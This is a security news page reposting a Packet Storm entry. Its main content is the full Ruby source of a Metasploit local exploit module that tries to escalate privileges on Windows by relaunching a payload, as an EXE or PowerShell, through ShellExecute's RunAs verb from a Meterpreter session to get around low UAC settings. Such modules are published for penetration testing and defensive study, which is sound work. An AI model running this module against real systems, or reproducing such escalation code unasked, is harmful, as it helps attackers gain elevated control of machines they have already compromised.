Security
Headlines
HeadlinesLatestCVEs

Headline

Windows Escalate UAC Execute RunAs

This Metasploit module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings.

Packet Storm
#windows#git#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Post::Windows::Priv  include Post::Windows::Runas  def initialize(info = {})    super(update_info(info,      'Name'          => 'Windows Escalate UAC Execute RunAs',      'Description'   => %q(        This module will attempt to elevate execution level using        the ShellExecute undocumented RunAs flag to bypass low        UAC settings.      ),      'License'       => MSF_LICENSE,      'Author'        => [        'mubix', # Original technique        'b00stfr3ak' # Added powershell option      ],      'Platform'      => ['win'],      'SessionTypes'  => ['meterpreter'],      'Targets'       => [['Windows', {}]],      'DefaultTarget' => 0,      'DisclosureDate' => '2012-01-03'    ))    register_options([      OptString.new('FILENAME', [false, 'File name on disk']),      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),    ])  end  def exploit    if is_uac_enabled?      print_status 'UAC is Enabled, checking level...'      case get_uac_level      when UAC_NO_PROMPT        print_good 'UAC is not enabled, no prompt for the user'      else        print_status "The user will be prompted, wait for them to click 'Ok'"      end    else      print_good 'UAC is not enabled, no prompt for the user'    end    case datastore['TECHNIQUE']    when 'EXE'      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])    when 'PSH'      shell_execute_psh    end  endend

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution